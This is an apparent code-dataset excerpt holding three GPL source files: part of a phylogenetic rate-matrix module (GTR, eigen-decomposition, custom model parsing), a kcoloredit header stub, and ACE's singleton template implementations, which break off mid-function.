	    Init_Qmat_RtREV(mod->mat_Q,mod->pi);
	    break;
	  }
	case 17 :
	  {
	    Init_Qmat_CpREV(mod->mat_Q,mod->pi);
	    break;
	  }
	case 18 :
	  {
	    Init_Qmat_VT(mod->mat_Q,mod->pi);
	    break;
	  }
	case 19 :
	  {
	    Init_Qmat_Blosum62(mod->mat_Q,mod->pi);
	    break;
	  }
	case 20 :
	  {
	    Init_Qmat_MtMam(mod->mat_Q,mod->pi);
	    break;
	  }
	default : break;
	}

      /* multiply the nth col of Q by the nth term of pi/100 just as in PAML */
      For(i,ns) For(j,ns) mod->mat_Q[i*ns+j] *= mod->pi[j] / 100.0;

      /* compute diagonal terms of Q and mean rate mr = l/t */
      mod->mr = .0;
      For (i,ns)
	{
	  sum=.0;
	  For(j, ns) sum += mod->mat_Q[i*ns+j];
	  mod->mat_Q[i*ns+i] = -sum;
	  mod->mr += mod->pi[i] * sum;
	}

      /* scale instantaneous rate matrix so that mu=1 */
      For (i,ns*ns) mod->mat_Q[i] /= mod->mr;

      /* compute eigenvectors/values (capture the status code — it was
	 previously discarded, making the error messages unreachable) */
      result = eigen(1, mod->mat_Q, ns, dr, di, mod->mat_Vr, mod->mat_Vi, space);
      if (result == 0)
	{
	  /* compute inverse(Vr) into Vi */
	  For (i,ns*ns) mod->mat_Vi[i] = mod->mat_Vr[i];
	  Matinv(mod->mat_Vi, ns, ns, space);
	  /* compute the diagonal terms of exp(D) */
	  For (i,ns) mod->vct_eDmr[i] = exp(dr[i]);
	}
      else
	{
	  if (result==-1)
	    printf("\n. Eigenvalues/vectors computation does not converge : computation cancelled");
	  else if (result==1)
	    printf("\n. Complex eigenvalues/vectors : computation cancelled");
	}
    }

  /* Remember the current parameter values for later comparison. */
  mod->alpha_old = mod->alpha;
  mod->kappa_old = mod->kappa;
  mod->lambda_old = mod->lambda;
  mod->pinvar_old = mod->pinvar;

  free(dr);free(di);free(space);
}
/*********************************************************/
/*
 * Update_Qmat_GTR: rebuild the 4x4 GTR instantaneous rate matrix from the
 * five free relative-rate parameters (the sixth, G<->T, is fixed at 1.0)
 * and the equilibrium frequencies, rescale it to a mean rate of 1, and
 * recompute its eigen system (eigenvalues into mod->vct_ev, right
 * eigenvectors into mod->mat_Vr, their inverse into mod->mat_Vi).
 *
 * BUGFIX: as in Init_Model, the return value of eigen() was discarded
 * ('result = 0; if (result == eigen(...))'), so the non-convergence /
 * complex-eigenvalue diagnostics below could never print. The status is
 * now captured (0 = ok, -1 = no convergence, 1 = complex eigenvalues).
 */
void Update_Qmat_GTR(model *mod)
{
  int result;
  int i,j,ns;
  double *di,*space,*mat_buff;

  ns = 4;

  /* Scratch buffers; mat_buff preserves mod->mat_Q because eigen()
     destroys its input matrix. */
  di = (double *)mCalloc(ns,sizeof(double));
  space = (double *)mCalloc(2*ns,sizeof(double));
  mat_buff = (double *)mCalloc(ns*ns,sizeof(double));

  /* Off-diagonal entries: q_ij = r_ij * pi_j (G<->T rate fixed to 1). */
  mod->mat_Q[0*4+1] = *(mod->rr_param[0])*mod->pi[1];
  mod->mat_Q[0*4+2] = *(mod->rr_param[1])*mod->pi[2];
  mod->mat_Q[0*4+3] = *(mod->rr_param[2])*mod->pi[3];
  mod->mat_Q[1*4+0] = *(mod->rr_param[0])*mod->pi[0];
  mod->mat_Q[1*4+2] = *(mod->rr_param[3])*mod->pi[2];
  mod->mat_Q[1*4+3] = *(mod->rr_param[4])*mod->pi[3];
  mod->mat_Q[2*4+0] = *(mod->rr_param[1])*mod->pi[0];
  mod->mat_Q[2*4+1] = *(mod->rr_param[3])*mod->pi[1];
  mod->mat_Q[2*4+3] = 1.0*mod->pi[3];
  mod->mat_Q[3*4+0] = *(mod->rr_param[2])*mod->pi[0];
  mod->mat_Q[3*4+1] = *(mod->rr_param[4])*mod->pi[1];
  mod->mat_Q[3*4+2] = 1.0*mod->pi[2];

  /* Diagonal entries: rows of Q must sum to zero. */
  mod->mat_Q[0*4+0] = -(*(mod->rr_param[0])*mod->pi[1]+*(mod->rr_param[1])*mod->pi[2]+*(mod->rr_param[2])*mod->pi[3]);
  mod->mat_Q[1*4+1] = -(*(mod->rr_param[0])*mod->pi[0]+*(mod->rr_param[3])*mod->pi[2]+*(mod->rr_param[4])*mod->pi[3]);
  mod->mat_Q[2*4+2] = -(*(mod->rr_param[1])*mod->pi[0]+*(mod->rr_param[3])*mod->pi[1]+1.0*mod->pi[3]);
  mod->mat_Q[3*4+3] = -(*(mod->rr_param[2])*mod->pi[0]+*(mod->rr_param[4])*mod->pi[1]+1.0*mod->pi[2]);

  /* compute diagonal terms of Q and mean rate mr = l/t */
  mod->mr = .0;
  For (i,ns) mod->mr += mod->pi[i] * (-mod->mat_Q[i*ns+i]);
  For(i,ns*ns) mod->mat_Q[i] /= mod->mr;
  /* printf("mr=%f\n",mod->mr); */

  /* compute eigenvectors/values on a copy, keeping mod->mat_Q intact;
     capture the status code (previously discarded — see BUGFIX above) */
  For(i,ns) For(j,ns) mat_buff[i*ns+j] = mod->mat_Q[i*ns+j];
  result = eigen(1, mat_buff, ns, mod->vct_ev, di, mod->mat_Vr, mod->mat_Vi, space);
  if (result == 0)
    {
      /* compute inverse(Vr) into Vi */
      For (i,ns*ns) mod->mat_Vi[i] = mod->mat_Vr[i];
      Matinv(mod->mat_Vi, ns, ns, space);
      /* compute the diagonal terms of exp(D) */
      For (i,ns) mod->vct_eDmr[i] = exp(mod->vct_ev[i]);
    }
  else
    {
      if (result==-1)
	printf("eigenvalues/vectors computation does not converge : computation cancelled");
      else if (result==1)
	printf("complex eigenvalues/vectors : computation cancelled");
    }

  Free(di);
  Free(space);
  Free(mat_buff);
}
/*********************************************************/
/*
 * Translate_Custom_Mod_String: parse the 6-character custom-model string
 * (one character per relative rate, e.g. "012345" = GTR, "000000" = JC/F81
 * style) into the model's rate-category bookkeeping. Positions carrying the
 * same character share one rate category; mod->n_diff_rr_param receives the
 * number of distinct categories, mod->rr_param_num[c][k] the positions
 * belonging to category c, and mod->n_rr_param_per_cat[c] their count.
 */
void Translate_Custom_Mod_String(model *mod)
{
  int pos, prev;
  int first_match;
  int *category_of;   /* category index assigned to each of the 6 positions */
  int *n_cat;

  category_of = (int *)mCalloc(6,sizeof(int));
  n_cat = &(mod->n_diff_rr_param);
  *n_cat = 0;

  for(pos = 0; pos < 6; pos++)
    {
      /* Look for an earlier position with the same character. */
      first_match = -1;
      for(prev = 0; prev < pos; prev++)
	{
	  if(mod->custom_mod_string[pos] == mod->custom_mod_string[prev])
	    {
	      first_match = prev;
	      break;
	    }
	}

      if(first_match < 0)
	{
	  /* Unseen character: open a new rate category. */
	  mod->rr_param_num[*n_cat][0] = pos;
	  mod->n_rr_param_per_cat[*n_cat] = 1;
	  category_of[pos] = *n_cat;
	  (*n_cat)++;
	}
      else
	{
	  /* Reuse the category of the first matching position. */
	  category_of[pos] = category_of[first_match];
	  mod->rr_param_num[category_of[pos]]
	    [mod->n_rr_param_per_cat[category_of[pos]]] = pos;
	  mod->n_rr_param_per_cat[category_of[pos]] += 1;
	}
    }

  Free(category_of);
}
/*********************************************************/
/*
 * Set_Model_Parameters: refresh derived model quantities before a
 * likelihood evaluation — discrete-gamma rate classes, normalised base
 * frequencies (when frequencies are being optimised), relative rates
 * scaled so the sixth rate equals 1, and, if requested, the GTR eigen
 * system.
 */
void Set_Model_Parameters(arbre *tree)
{
  model *mod;
  double freq_sum;
  int i;

  mod = tree->mod;

  /* Recompute the discrete-gamma rate classes and their probabilities. */
  DiscreteGamma (mod->r_proba, mod->rr, mod->alpha,
		 mod->alpha,mod->n_catg,0);

  /* Renormalise the base frequencies while they are being optimised
     (nucleotide models only). */
  if((mod->whichmodel < 10) && (mod->s_opt->opt_bfreq))
    {
      freq_sum = .0;
      for(i = 0; i < 4; i++) freq_sum += mod->pi[i];
      for(i = 0; i < 4; i++)
	{
	  mod->pi[i] /= freq_sum;
	  /* printf("pi[%d]->%f\n",i+1,mod->pi[i]); */
	}
    }

  /* Anchor the relative rates: divide all six by the last one, so the
     sixth rate becomes 1 (divisions at i<5 do not touch element 5). */
  if(mod->whichmodel >= 7)
    {
      for(i = 0; i < 6; i++)
	mod->rr_param_values[i] /= mod->rr_param_values[5];
    }

  /* Rebuild the eigen system when the rate matrix changed
     (nucleotide GTR-family models only). */
  if(mod->update_eigen)
    {
      if(!mod->datatype)
	{
	  if(mod->whichmodel < 20) Update_Qmat_GTR(mod);
	}
    }
}
/*********************************************************/
| gpl-2.0 |
iegor/kdegraphics | kcoloredit/editablestreamhistory.cpp | 2 | 1065 | /***************************************************************************
editablestream.cpp - description
-------------------
begin : Sun Jul 9 2000
copyright : (C) 2000 by Artur Rataj
email : art@zeus.polsl.gliwice.pl
***************************************************************************/
/***************************************************************************
* *
* This program is free software; you can redistribute it and/or modify *
* it under the terms of the GNU General Public License as published by *
* the Free Software Foundation; either version 2 of the License, or *
* (at your option) any later version. *
* *
***************************************************************************/
#include "editablestreamhistory.h"
| gpl-2.0 |
NightCotRe0110/SkyFire.548 | dep/acelite/ace/Singleton.cpp | 2 | 19514 | #ifndef ACE_SINGLETON_CPP
#define ACE_SINGLETON_CPP
#include "ace/Singleton.h"
#if !defined (ACE_LACKS_PRAGMA_ONCE)
# pragma once
#endif /* ACE_LACKS_PRAGMA_ONCE */
#if !defined (__ACE_INLINE__)
#include "ace/Singleton.inl"
#endif /* __ACE_INLINE__ */
#include "ace/Object_Manager.h"
#include "ace/Log_Category.h"
#include "ace/Framework_Component.h"
#include "ace/Guard_T.h"
#include "ace/os_include/os_typeinfo.h"
ACE_BEGIN_VERSIONED_NAMESPACE_DECL
ACE_ALLOC_HOOK_DEFINE_Tcc(ACE_Singleton)
ACE_ALLOC_HOOK_DEFINE_Tcc(ACE_Unmanaged_Singleton)
ACE_ALLOC_HOOK_DEFINE_Tcc(ACE_TSS_Singleton)
ACE_ALLOC_HOOK_DEFINE_Tcc(ACE_Unmanaged_TSS_Singleton)
ACE_ALLOC_HOOK_DEFINE_Tcc(ACE_DLL_Singleton_T)
ACE_ALLOC_HOOK_DEFINE_Tc(ACE_DLL_Singleton_Adapter_T)
// Debug dump for the managed singleton: prints the address of the
// current instance (only compiled in when ACE_HAS_DUMP is defined).
template <class TYPE, class ACE_LOCK> void
ACE_Singleton<TYPE, ACE_LOCK>::dump (void)
{
#if defined (ACE_HAS_DUMP)
ACE_TRACE ("ACE_Singleton<TYPE, ACE_LOCK>::dump");
#if !defined (ACE_LACKS_STATIC_DATA_MEMBER_TEMPLATES)
ACELIB_DEBUG ((LM_DEBUG, ACE_TEXT ("instance_ = %x"),
ACE_Singleton<TYPE, ACE_LOCK>::instance_i ()));
ACELIB_DEBUG ((LM_DEBUG, ACE_END_DUMP));
#endif /* ACE_LACKS_STATIC_DATA_MEMBER_TEMPLATES */
#endif /* ACE_HAS_DUMP */
}
// Access the singleton pointer itself (reference to the pointer, so
// callers can both read and reset it). Storage is either a function-local
// static (workaround for compilers lacking static data members of
// templates) or the class-static singleton_ below.
template <class TYPE, class ACE_LOCK> ACE_Singleton<TYPE, ACE_LOCK> *&
ACE_Singleton<TYPE, ACE_LOCK>::instance_i (void)
{
#if defined (ACE_LACKS_STATIC_DATA_MEMBER_TEMPLATES)
// Pointer to the Singleton instance. This works around a bug with
// G++ and it's (mis-)handling of templates and statics...
static ACE_Singleton<TYPE, ACE_LOCK> *singleton_ = 0;
return singleton_;
#else
return ACE_Singleton<TYPE, ACE_LOCK>::singleton_;
#endif /* ACE_LACKS_STATIC_DATA_MEMBER_TEMPLATES */
}
// Return the wrapped TYPE instance, creating it lazily on first use.
// Uses double-checked locking with a lock obtained from the
// ACE_Object_Manager, and registers the instance for destruction at
// program exit. During startup/shutdown the instance is deliberately
// leaked (no lock and no exit hook are available then).
template <class TYPE, class ACE_LOCK> TYPE *
ACE_Singleton<TYPE, ACE_LOCK>::instance (void)
{
ACE_TRACE ("ACE_Singleton<TYPE, ACE_LOCK>::instance");
ACE_Singleton<TYPE, ACE_LOCK> *&singleton =
ACE_Singleton<TYPE, ACE_LOCK>::instance_i ();
// Perform the Double-Check pattern...
if (singleton == 0)
{
if (ACE_Object_Manager::starting_up () ||
ACE_Object_Manager::shutting_down ())
{
// The program is still starting up, and therefore assumed
// to be single threaded. There's no need to double-check.
// Or, the ACE_Object_Manager instance has been destroyed,
// so the preallocated lock is not available. Either way,
// don't register for destruction with the
// ACE_Object_Manager: we'll have to leak this instance.
ACE_NEW_RETURN (singleton, (ACE_Singleton<TYPE, ACE_LOCK>), 0);
}
else
{
#if defined (ACE_MT_SAFE) && (ACE_MT_SAFE != 0)
// Obtain a lock from the ACE_Object_Manager. The pointer
// is static, so we only obtain one per ACE_Singleton
// instantiation.
#if defined(ACE_FACE_SAFETY_BASE)
static ACE_LOCK the_lock;
static ACE_LOCK *lock = &the_lock;
#else /* ACE_FACE_SAFETY_BASE */
static ACE_LOCK *lock = 0;
#endif /* ACE_FACE_SAFETY_BASE */
if (ACE_Object_Manager::get_singleton_lock (lock) != 0)
// Failed to acquire the lock!
return 0;
ACE_GUARD_RETURN (ACE_LOCK, ace_mon, *lock, 0);
// Re-check under the lock (second half of double-checked locking).
if (singleton == 0)
{
#endif /* ACE_MT_SAFE */
ACE_NEW_RETURN (singleton, (ACE_Singleton<TYPE, ACE_LOCK>), 0);
// Register for destruction with ACE_Object_Manager.
ACE_Object_Manager::at_exit (singleton, 0, typeid (TYPE).name ());
#if defined (ACE_MT_SAFE) && (ACE_MT_SAFE != 0)
}
#endif /* ACE_MT_SAFE */
}
}
return &singleton->instance_;
}
// ACE_Cleanup hook: called by the ACE_Object_Manager at shutdown.
// Deregisters, destroys the singleton wrapper and resets the pointer.
template <class TYPE, class ACE_LOCK> void
ACE_Singleton<TYPE, ACE_LOCK>::cleanup (void *)
{
ACE_Object_Manager::remove_at_exit (this);
delete this;
ACE_Singleton<TYPE, ACE_LOCK>::instance_i () = 0;
}
// Explicitly destroy the singleton before normal program exit.
template <class TYPE, class ACE_LOCK> void
ACE_Singleton<TYPE, ACE_LOCK>::close (void)
{
ACE_Singleton<TYPE, ACE_LOCK> *&singleton =
ACE_Singleton<TYPE, ACE_LOCK>::instance_i ();
if (singleton)
{
singleton->cleanup ();
ACE_Singleton<TYPE, ACE_LOCK>::instance_i () = 0;
}
}
#if !defined (ACE_LACKS_STATIC_DATA_MEMBER_TEMPLATES)
// Pointer to the Singleton instance.
template <class TYPE, class ACE_LOCK> ACE_Singleton<TYPE, ACE_LOCK> *
ACE_Singleton<TYPE, ACE_LOCK>::singleton_ = 0;
template <class TYPE, class ACE_LOCK> ACE_Unmanaged_Singleton<TYPE, ACE_LOCK> *
ACE_Unmanaged_Singleton<TYPE, ACE_LOCK>::singleton_ = 0;
#endif /* !defined (ACE_LACKS_STATIC_DATA_MEMBER_TEMPLATES) */
// Debug dump for the unmanaged singleton variant (ACE_HAS_DUMP only).
template <class TYPE, class ACE_LOCK> void
ACE_Unmanaged_Singleton<TYPE, ACE_LOCK>::dump (void)
{
#if defined (ACE_HAS_DUMP)
ACE_TRACE ("ACE_Unmanaged_Singleton<TYPE, ACE_LOCK>::dump");
#if !defined (ACE_LACKS_STATIC_DATA_MEMBER_TEMPLATES)
ACELIB_DEBUG ((LM_DEBUG, ACE_TEXT ("instance_ = %x"),
ACE_Unmanaged_Singleton<TYPE, ACE_LOCK>::instance_i ()));
ACELIB_DEBUG ((LM_DEBUG, ACE_END_DUMP));
#endif /* ACE_LACKS_STATIC_DATA_MEMBER_TEMPLATES */
#endif /* ACE_HAS_DUMP */
}
// Access the unmanaged singleton pointer (reference so callers can reset).
template <class TYPE, class ACE_LOCK>
ACE_Unmanaged_Singleton<TYPE, ACE_LOCK> *&
ACE_Unmanaged_Singleton<TYPE, ACE_LOCK>::instance_i (void)
{
#if defined (ACE_LACKS_STATIC_DATA_MEMBER_TEMPLATES)
// Pointer to the Singleton instance. This works around a bug with
// G++ and it's (mis-)handling of templates and statics...
static ACE_Unmanaged_Singleton<TYPE, ACE_LOCK> *singleton_ = 0;
return singleton_;
#else
return ACE_Unmanaged_Singleton<TYPE, ACE_LOCK>::singleton_;
#endif /* ACE_LACKS_STATIC_DATA_MEMBER_TEMPLATES */
}
// Like ACE_Singleton::instance, but does NOT register the instance with
// the ACE_Object_Manager for automatic destruction — the user is
// responsible for calling close() (hence "unmanaged").
template <class TYPE, class ACE_LOCK> TYPE *
ACE_Unmanaged_Singleton<TYPE, ACE_LOCK>::instance (void)
{
ACE_TRACE ("ACE_Unmanaged_Singleton<TYPE, ACE_LOCK>::instance");
ACE_Unmanaged_Singleton<TYPE, ACE_LOCK> *&singleton =
ACE_Unmanaged_Singleton<TYPE, ACE_LOCK>::instance_i ();
// Perform the Double-Check pattern...
if (singleton == 0)
{
if (ACE_Object_Manager::starting_up () ||
ACE_Object_Manager::shutting_down ())
{
// The program is still starting up, and therefore assumed
// to be single threaded. There's no need to double-check.
// Or, the ACE_Object_Manager instance has been destroyed,
// so the preallocated lock is not available. Either way,
// don't register for destruction with the
// ACE_Object_Manager: we'll have to leak this instance.
ACE_NEW_RETURN (singleton, (ACE_Unmanaged_Singleton<TYPE, ACE_LOCK>),
0);
}
else
{
#if defined (ACE_MT_SAFE) && (ACE_MT_SAFE != 0)
// Obtain a lock from the ACE_Object_Manager. The pointer
// is static, so we only obtain one per
// ACE_Unmanaged_Singleton instantiation.
#if defined(ACE_FACE_SAFETY_BASE)
static ACE_LOCK the_lock;
static ACE_LOCK *lock = &the_lock;
#else /* ACE_FACE_SAFETY_BASE */
static ACE_LOCK *lock = 0;
#endif /* ACE_FACE_SAFETY_BASE */
if (ACE_Object_Manager::get_singleton_lock (lock) != 0)
// Failed to acquire the lock!
return 0;
ACE_GUARD_RETURN (ACE_LOCK, ace_mon, *lock, 0);
#endif /* ACE_MT_SAFE */
// Re-check under the lock; no at_exit registration here.
if (singleton == 0)
ACE_NEW_RETURN (singleton,
(ACE_Unmanaged_Singleton<TYPE, ACE_LOCK>),
0);
}
}
return &singleton->instance_;
}
// Explicitly destroy the unmanaged singleton (the user's obligation).
template <class TYPE, class ACE_LOCK> void
ACE_Unmanaged_Singleton<TYPE, ACE_LOCK>::close (void)
{
ACE_Unmanaged_Singleton<TYPE, ACE_LOCK> *&singleton =
ACE_Unmanaged_Singleton<TYPE, ACE_LOCK>::instance_i ();
if (singleton)
{
singleton->cleanup ();
ACE_Unmanaged_Singleton<TYPE, ACE_LOCK>::instance_i () = 0;
}
}
// Debug dump for the thread-specific-storage singleton (ACE_HAS_DUMP only).
template <class TYPE, class ACE_LOCK> void
ACE_TSS_Singleton<TYPE, ACE_LOCK>::dump (void)
{
#if defined (ACE_HAS_DUMP)
ACE_TRACE ("ACE_TSS_Singleton<TYPE, ACE_LOCK>::dump");
#if !defined (ACE_LACKS_STATIC_DATA_MEMBER_TEMPLATES)
ACELIB_DEBUG ((LM_DEBUG, ACE_TEXT ("instance_ = %x"),
ACE_TSS_Singleton<TYPE, ACE_LOCK>::instance_i ()));
ACELIB_DEBUG ((LM_DEBUG, ACE_END_DUMP));
#endif /* ACE_LACKS_STATIC_DATA_MEMBER_TEMPLATES */
#endif /* ACE_HAS_DUMP */
}
// Access the TSS singleton wrapper pointer (reference for read/reset).
template <class TYPE, class ACE_LOCK> ACE_TSS_Singleton<TYPE, ACE_LOCK> *&
ACE_TSS_Singleton<TYPE, ACE_LOCK>::instance_i (void)
{
#if defined (ACE_LACKS_STATIC_DATA_MEMBER_TEMPLATES)
// Pointer to the Singleton instance. This works around a bug with
// G++ and it's (mis-)handling of templates and statics...
static ACE_TSS_Singleton<TYPE, ACE_LOCK> *singleton_ = 0;
return singleton_;
#else
return ACE_TSS_Singleton<TYPE, ACE_LOCK>::singleton_;
#endif /* ACE_LACKS_STATIC_DATA_MEMBER_TEMPLATES */
}
// Like ACE_Singleton::instance, but the wrapper holds a TSS object:
// ACE_TSS_GET at the end hands out a per-thread copy of TYPE. The
// wrapper itself is created once (double-checked locking) and registered
// with the ACE_Object_Manager for destruction at exit.
template <class TYPE, class ACE_LOCK> TYPE *
ACE_TSS_Singleton<TYPE, ACE_LOCK>::instance (void)
{
ACE_TRACE ("ACE_TSS_Singleton<TYPE, ACE_LOCK>::instance");
ACE_TSS_Singleton<TYPE, ACE_LOCK> *&singleton =
ACE_TSS_Singleton<TYPE, ACE_LOCK>::instance_i ();
// Perform the Double-Check pattern...
if (singleton == 0)
{
if (ACE_Object_Manager::starting_up () ||
ACE_Object_Manager::shutting_down ())
{
// The program is still starting up, and therefore assumed
// to be single threaded. There's no need to double-check.
// Or, the ACE_Object_Manager instance has been destroyed,
// so the preallocated lock is not available. Either way,
// don't register for destruction with the
// ACE_Object_Manager: we'll have to leak this instance.
ACE_NEW_RETURN (singleton, (ACE_TSS_Singleton<TYPE, ACE_LOCK>), 0);
}
else
{
#if defined (ACE_MT_SAFE) && (ACE_MT_SAFE != 0)
// Obtain a lock from the ACE_Object_Manager. The pointer
// is static, so we only obtain one per ACE_Singleton instantiation.
#if defined(ACE_FACE_SAFETY_BASE)
static ACE_LOCK the_lock;
static ACE_LOCK *lock = &the_lock;
#else /* ACE_FACE_SAFETY_BASE */
static ACE_LOCK *lock = 0;
#endif /* ACE_FACE_SAFETY_BASE */
if (ACE_Object_Manager::get_singleton_lock (lock) != 0)
// Failed to acquire the lock!
return 0;
ACE_GUARD_RETURN (ACE_LOCK, ace_mon, *lock, 0);
if (singleton == 0)
{
#endif /* ACE_MT_SAFE */
ACE_NEW_RETURN (singleton, (ACE_TSS_Singleton<TYPE, ACE_LOCK>),
0);
// Register for destruction with ACE_Object_Manager.
ACE_Object_Manager::at_exit (singleton, 0, typeid (TYPE).name ());
#if defined (ACE_MT_SAFE) && (ACE_MT_SAFE != 0)
}
#endif /* ACE_MT_SAFE */
}
}
return ACE_TSS_GET (&singleton->instance_, TYPE);
}
// ACE_Cleanup hook: destroy the TSS wrapper and reset the pointer.
template <class TYPE, class ACE_LOCK> void
ACE_TSS_Singleton<TYPE, ACE_LOCK>::cleanup (void *)
{
delete this;
ACE_TSS_Singleton<TYPE, ACE_LOCK>::instance_i () = 0;
}
// Debug dump for the unmanaged TSS singleton variant (ACE_HAS_DUMP only).
template <class TYPE, class ACE_LOCK> void
ACE_Unmanaged_TSS_Singleton<TYPE, ACE_LOCK>::dump (void)
{
#if defined (ACE_HAS_DUMP)
ACE_TRACE ("ACE_Unmanaged_TSS_Singleton<TYPE, ACE_LOCK>::dump");
#if !defined (ACE_LACKS_STATIC_DATA_MEMBER_TEMPLATES)
ACELIB_DEBUG ((LM_DEBUG, ACE_TEXT ("instance_ = %x"),
ACE_Unmanaged_TSS_Singleton<TYPE, ACE_LOCK>::instance_i ()));
ACELIB_DEBUG ((LM_DEBUG, ACE_END_DUMP));
#endif /* ACE_LACKS_STATIC_DATA_MEMBER_TEMPLATES */
#endif /* ACE_HAS_DUMP */
}
// Access the unmanaged TSS singleton wrapper pointer.
template <class TYPE, class ACE_LOCK>
ACE_Unmanaged_TSS_Singleton<TYPE, ACE_LOCK> *&
ACE_Unmanaged_TSS_Singleton<TYPE, ACE_LOCK>::instance_i (void)
{
#if defined (ACE_LACKS_STATIC_DATA_MEMBER_TEMPLATES)
// Pointer to the Singleton instance. This works around a bug with
// G++ and it's (mis-)handling of templates and statics...
static ACE_Unmanaged_TSS_Singleton<TYPE, ACE_LOCK> *singleton_ = 0;
return singleton_;
#else
return ACE_Unmanaged_TSS_Singleton<TYPE, ACE_LOCK>::singleton_;
#endif /* ACE_LACKS_STATIC_DATA_MEMBER_TEMPLATES */
}
// TSS singleton without ACE_Object_Manager registration: per-thread TYPE
// instances via ACE_TSS_GET; the user must call close() to destroy it.
template <class TYPE, class ACE_LOCK> TYPE *
ACE_Unmanaged_TSS_Singleton<TYPE, ACE_LOCK>::instance (void)
{
ACE_TRACE ("ACE_Unmanaged_TSS_Singleton<TYPE, ACE_LOCK>::instance");
ACE_Unmanaged_TSS_Singleton<TYPE, ACE_LOCK> *&singleton =
ACE_Unmanaged_TSS_Singleton<TYPE, ACE_LOCK>::instance_i ();
// Perform the Double-Check pattern...
if (singleton == 0)
{
if (ACE_Object_Manager::starting_up () ||
ACE_Object_Manager::shutting_down ())
{
// The program is still starting up, and therefore assumed
// to be single threaded. There's no need to double-check.
// Or, the ACE_Object_Manager instance has been destroyed,
// so the preallocated lock is not available. Either way,
// don't register for destruction with the
// ACE_Object_Manager: we'll have to leak this instance.
ACE_NEW_RETURN (singleton,
(ACE_Unmanaged_TSS_Singleton<TYPE, ACE_LOCK>),
0);
}
else
{
#if defined (ACE_MT_SAFE) && (ACE_MT_SAFE != 0)
// Obtain a lock from the ACE_Object_Manager. The pointer
// is static, so we only obtain one per
// ACE_Unmanaged_Singleton instantiation.
#if defined(ACE_FACE_SAFETY_BASE)
static ACE_LOCK the_lock;
static ACE_LOCK *lock = &the_lock;
#else /* ACE_FACE_SAFETY_BASE */
static ACE_LOCK *lock = 0;
#endif /* ACE_FACE_SAFETY_BASE */
if (ACE_Object_Manager::get_singleton_lock (lock) != 0)
// Failed to acquire the lock!
return 0;
ACE_GUARD_RETURN (ACE_LOCK, ace_mon, *lock, 0);
#endif /* ACE_MT_SAFE */
// Re-check under the lock; no at_exit registration (unmanaged).
if (singleton == 0)
ACE_NEW_RETURN (singleton,
(ACE_Unmanaged_TSS_Singleton<TYPE, ACE_LOCK>),
0);
}
}
return ACE_TSS_GET (&singleton->instance_, TYPE);
}
// Explicitly destroy the unmanaged TSS singleton.
// NOTE(review): unlike the non-TSS variants, the pointer is not reset to
// 0 here — cleanup() presumably does that; confirm against cleanup().
template <class TYPE, class ACE_LOCK> void
ACE_Unmanaged_TSS_Singleton<TYPE, ACE_LOCK>::close (void)
{
ACE_Unmanaged_TSS_Singleton<TYPE, ACE_LOCK> *&singleton =
ACE_Unmanaged_TSS_Singleton<TYPE, ACE_LOCK>::instance_i ();
if (singleton)
singleton->cleanup ();
}
#if !defined (ACE_LACKS_STATIC_DATA_MEMBER_TEMPLATES)
// Pointer to the Singleton instance.
template <class TYPE, class ACE_LOCK> ACE_TSS_Singleton <TYPE, ACE_LOCK> *
ACE_TSS_Singleton<TYPE, ACE_LOCK>::singleton_ = 0;
template <class TYPE, class ACE_LOCK>
ACE_Unmanaged_TSS_Singleton<TYPE, ACE_LOCK> *
ACE_Unmanaged_TSS_Singleton<TYPE, ACE_LOCK>::singleton_ = 0;
#endif /* !defined (ACE_LACKS_STATIC_DATA_MEMBER_TEMPLATES) */
/*************************************************************************/
#if !defined (ACE_LACKS_STATIC_DATA_MEMBER_TEMPLATES)
// Pointer to the Singleton instance.
template <class TYPE, class ACE_LOCK> ACE_DLL_Singleton_T<TYPE, ACE_LOCK> *
ACE_DLL_Singleton_T<TYPE, ACE_LOCK>::singleton_ = 0;
#endif /* !defined (ACE_LACKS_STATIC_DATA_MEMBER_TEMPLATES) */
// Debug dump for the DLL-aware singleton variant (ACE_HAS_DUMP only).
template <class TYPE, class ACE_LOCK> void
ACE_DLL_Singleton_T<TYPE, ACE_LOCK>::dump (void)
{
#if defined (ACE_HAS_DUMP)
ACE_TRACE ("ACE_DLL_Singleton_T<TYPE, ACE_LOCK>::dump");
#if !defined (ACE_LACKS_STATIC_DATA_MEMBER_TEMPLATES)
ACELIB_DEBUG ((LM_DEBUG, ACE_TEXT ("instance_ = %x"),
ACE_DLL_Singleton_T<TYPE, ACE_LOCK>::instance_i ()));
ACELIB_DEBUG ((LM_DEBUG, ACE_END_DUMP));
#endif /* ACE_LACKS_STATIC_DATA_MEMBER_TEMPLATES */
#endif /* ACE_HAS_DUMP */
}
// Access the DLL singleton wrapper pointer (reference for read/reset).
template <class TYPE, class ACE_LOCK>
ACE_DLL_Singleton_T<TYPE, ACE_LOCK> *&
ACE_DLL_Singleton_T<TYPE, ACE_LOCK>::instance_i (void)
{
ACE_TRACE ("ACE_DLL_Singleton_T<TYPE, ACE_LOCK>::instance_i");
#if defined (ACE_LACKS_STATIC_DATA_MEMBER_TEMPLATES)
// Pointer to the Singleton instance. This works around a bug with
// G++ and it's (mis-)handling of templates and statics...
static ACE_DLL_Singleton_T<TYPE, ACE_LOCK> *singleton_ = 0;
return singleton_;
#else
return ACE_DLL_Singleton_T<TYPE, ACE_LOCK>::singleton_;
#endif /* ACE_LACKS_STATIC_DATA_MEMBER_TEMPLATES */
}
// Like ACE_Singleton::instance, but instead of an ACE_Object_Manager
// at_exit hook the freshly created singleton is registered with the
// ACE_Framework_Repository, so it can be cleaned up when the DLL that
// contains it is unloaded.
template <class TYPE, class ACE_LOCK> TYPE *
ACE_DLL_Singleton_T<TYPE, ACE_LOCK>::instance (void)
{
ACE_TRACE ("ACE_DLL_Singleton_T<TYPE, ACE_LOCK>::instance");
ACE_DLL_Singleton_T<TYPE, ACE_LOCK> *&singleton =
ACE_DLL_Singleton_T<TYPE, ACE_LOCK>::instance_i ();
// Perform the Double-Check pattern...
if (singleton == 0)
{
if (ACE_Object_Manager::starting_up () ||
ACE_Object_Manager::shutting_down ())
{
// The program is still starting up, and therefore assumed
// to be single threaded. There's no need to double-check.
// Or, the ACE_Object_Manager instance has been destroyed,
// so the preallocated lock is not available. Either way,
// don't register for destruction with the
// ACE_Object_Manager: we'll have to leak this instance.
ACE_NEW_RETURN (singleton, (ACE_DLL_Singleton_T<TYPE, ACE_LOCK>),
0);
}
else
{
#if defined (ACE_MT_SAFE) && (ACE_MT_SAFE != 0)
// Obtain a lock from the ACE_Object_Manager. The pointer
// is static, so we only obtain one per
// ACE_Unmanaged_Singleton instantiation.
#if defined(ACE_FACE_SAFETY_BASE)
static ACE_LOCK the_lock;
